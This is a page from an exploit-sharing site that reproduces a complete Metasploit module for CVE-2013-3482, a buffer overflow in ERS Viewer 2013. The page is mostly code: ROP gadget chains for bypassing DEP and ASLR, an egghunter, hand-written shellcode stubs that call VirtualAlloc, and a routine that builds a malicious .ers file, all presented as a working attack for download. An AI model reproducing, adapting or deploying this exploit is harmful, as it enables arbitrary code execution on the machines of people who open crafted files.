0day.today - Biggest Exploit Database in the World.
- We use one main domain: http://0day.today
- Most of the materials is completely FREE
- If you want to purchase the exploit / get V.I.P. access or pay for any other service,
you need to buy or earn
GOLD
Administration of this site uses the official contacts. Beware of impostors!
We DO NOT use Telegram or any messengers / social networks!Please, beware of scammers!
- Read the [ agreement ]
- Read the [ Submit ] rules
- Visit the [ faq ] page
- [ Register ] profile
- Get [ GOLD ]
- If you want to [ sell ]
- If you want to [ buy ]
- If you lost [ Account ]
- Any questions [ admin@0day.today ]
- Authorisation page
- Registration page
- Restore account page
- FAQ page
- Contacts page
- Publishing rules
- Agreement page
Mail:
Facebook:
Twitter:
Telegram:
We DO NOT use Telegram or any messengers / social networks!
Contact us
You can contact us by:
Mail:
Facebook:
Twitter:
Telegram:
We DO NOT use Telegram or any messengers / social networks!
ERS Viewer 2013 ERS File Handling Buffer Overflow
Author
Risk
[Security Risk High
]0day-ID
Category
Date add
CVE
Platform
require 'msf/core'
class Metasploit3 < Msf::Exploit::Remote
Rank = NormalRanking
include Msf::Exploit::FILEFORMAT
include Msf::Exploit::Remote::Egghunter
def initialize(info={})
super(update_info(info,
'Name' => "ERS Viewer 2013 ERS File Handling Buffer Overflow",
'Description' => %q{
This module exploits a buffer overflow vulnerability found in ERS Viewer 2013.
The vulnerability exists in the module ermapper_u.dll, where the function
rf_report_error handles user provided data in a insecure way. It results in
arbitrary code execution under the context of the user viewing a specially crafted
.ers file. This module has been tested successfully with ERS Viewer 2013 (versions
13.0.0.1151) on Windows XP SP3 and Windows 7 SP1.
},
'License' => MSF_LICENSE,
'Author' =>
[
'James Fitts', # Vulnerability Discovery
'juan vazquez' # Metasploit
],
'References' =>
[
[ 'CVE', '2013-3482' ],
[ 'OSVDB', '93650' ],
[ 'URL', 'http://secunia.com/advisories/53620/' ]
],
'Payload' =>
{
'Space' => 4000,
'DisableNops' => true,
},
'DefaultOptions' =>
{
'ExitFunction' => "process",
},
'Platform' => 'win',
'Targets' =>
[
# Tested on Windows XP SP3
[ 'ERS Viewer 2013 13.0.0.1151 / NO DEP / NO ASLR',
{
'Offset' => 191,
'Ret' => 0x100329E9 # jmp eax # from ermapper_u.dll
}
],
# Tested on Windows XP SP3 and Windows 7 SP1
[ 'ERS Viewer 2013 13.0.0.1151 / DEP & ASLR bypass',
{
'Offset' => 191,
'Ret' => 0x100E1152, # xchg eax, esp # ret # from ermapper_u.dll
'RetNull' => 0x30d07f00, # ret ending with null byte # from ethrlib.dll
'VirtualAllocPtr' => 0x1010c0f4
}
]
],
'Privileged' => false,
'DisclosureDate' => "May 23 2013",
'DefaultTarget' => 1))
register_options(
[
OptString.new('FILENAME', [ true, 'The file name.', 'msf.ers']),
], self.class)
end
def create_rop_chain()
# rop chain generated with mona.py - www.corelan.be
rop_gadgets =
[
0x10082624, # POP EAX # RETN [ermapper_u.dll]
0x1010c0f4, # ptr to &VirtualAlloc() [IAT ermapper_u.dll]
0x1001a9c0, # MOV EAX,DWORD PTR DS:[EAX] # RETN [ermapper_u.dll]
0x1005db36, # XCHG EAX,ESI # RETN [ermapper_u.dll]
0x10105d87, # POP EBX # RETN [ermapper_u.dll]
0xffffffff, #
0x30d059d9, # INC EBX # RETN [ethrlib.dll]
0x30d059d9, # INC EBX # RETN [ethrlib.dll]
0x100e9dd9, # POP EAX # RETN [ermapper_u.dll]
0xa2dbcf75, # put delta into eax (-> put 0x00001000 into edx)
0x1001aa04, # ADD EAX,5D24408B # RETN [ermapper_u.dll]
0x10016a98, # XCHG EAX,EDX # OR EAX,4C48300 # POP EDI # POP EBP # RETN [ermapper_u.dll]
0x10086d21, # RETN (ROP NOP) [ermapper_u.dll]
0x1001a148, # & push esp # ret [ermapper_u.dll]
0x10082624, # POP EAX # RETN [ermapper_u.dll]
0xffffffc0, # Value to negate, will become 0x00000040
0x100f687d, # NEG EAX # RETN [ermapper_u.dll]
0x1001e720, # XCHG EAX,ECX # ADC EAX,5DE58B10 # RETN [ermapper_u.dll]
0x100288b5, # POP EAX # RETN [ermapper_u.dll]
0x90909090, # nop
0x100e69e0, # PUSHAD # RETN [ermapper_u.dll]
].flatten.pack("V*")
return rop_gadgets
end
# Restore the stack pointer in order to execute the final payload successfully
def fix_stack
pivot = "\x64\xa1\x18\x00\x00\x00" # mov eax, fs:[0x18] # get teb
pivot << "\x83\xC0\x08" # add eax, byte 8 # get pointer to stacklimit
pivot << "\x8b\x20" # mov esp, [eax] # put esp at stacklimit
pivot << "\x81\xC4\x30\xF8\xFF\xFF" # add esp, -2000 # plus a little offset
return pivot
end
# In the Windows 7 case, in order to bypass ASLR/DEP successfully, after finding
# the payload on memory we can't jump there directly, but allocate executable memory
# and jump there. Badchars: "\x0a\x0d\x00"
def hunter_suffix(payload_length)
# push flProtect (0x40)
suffix = "\xB8\xC0\xFF\xFF\xFF" # mov eax, 0xffffffc0
suffix << "\xF7\xD8" # neg eax
suffix << "\x50" # push eax
# push flAllocationType (0x3000)
suffix << "\x66\x05\xC0\x2F" # add ax, 0x2fc0
suffix << "\x50" # push eax
# push dwSize (0x1000)
suffix << "\x66\x2D\xFF\x1F" # sub ax, 0x1fff
suffix << "\x48" # dec eax
suffix << "\x50" # push eax
# push lpAddress
suffix << "\xB8\x0C\x0C\x0C\x0C" # mov eax, 0x0c0c0c0c
suffix << "\x50" # push eax
# Call VirtualAlloc
suffix << "\xFF\x15" + [target['VirtualAllocPtr']].pack("V") # call ds:VirtualAlloc
# Copy payload (edi) to Allocated memory (eax)
suffix << "\x89\xFE" # mov esi, edi
suffix << "\x89\xC7" # mov edi, eax
suffix << "\x31\xC9" # xor ecx, ecx
suffix << "\x66\x81\xC1" + [payload_length].pack("v") # add cx, payload_length
suffix << "\xF3\xA4" # rep movsb
# Jmp to the final payload (eax)
suffix << "\xFF\xE0" # jmp eax
return suffix
end
def exploit
#These badchars do not apply to the final payload
badchars = [0x0c, 0x0d, 0x0a].pack("C*")
eggoptions =
{
:checksum => true,
:eggtag => 'w00t'
}
my_payload = fix_stack + payload.encoded
if target.name =~ /DEP & ASLR bypass/
# The payload length can't include NULL's in order to
# build the stub which will copy the final payload to
# executable memory
while [my_payload.length].pack("v").include?("\x00")
my_payload << rand_text(1)
end
end
hunter,egg = generate_egghunter(my_payload, badchars, eggoptions)
if target.name =~ /DEP & ASLR bypass/
hunter.gsub!(/\xff\xe7/, hunter_suffix(my_payload.length))
end
if target.name =~ /NO DEP/
buf = rand_text_alpha(1)
buf << (0x01..0x04).to_a.pack("C*") # Necessary to align EAX as expected
buf << "AA" # EAX pointing to buf[5] prefixed with 0x00 after ret
buf << hunter
buf << rand_text_alpha(target['Offset'] - buf.length)
buf << [target.ret].pack("V") # jmp eax
buf << rand_text_alpha(8)
buf << egg
elsif target.name =~ /DEP & ASLR bypass/
buf = rand_text_alpha(1)
buf << (0x01..0x04).to_a.pack("C*") # Necessary to align EAX as expected
buf << [target['RetNull']].pack("V")[1,3] # EAX pointing to buf[5] prefixed with 0x00 after ret
buf << create_rop_chain
buf << hunter
buf << rand_text_alpha(target['Offset'] - buf.length)
buf << [target.ret].pack("V") # xchg eax, esp # ret
buf << rand_text_alpha(8)
buf << egg
end
ers = %Q|
DatasetHeader Begin
#{buf} End
|
file_create(ers)
end
end
# 0day.today [2024-11-16] #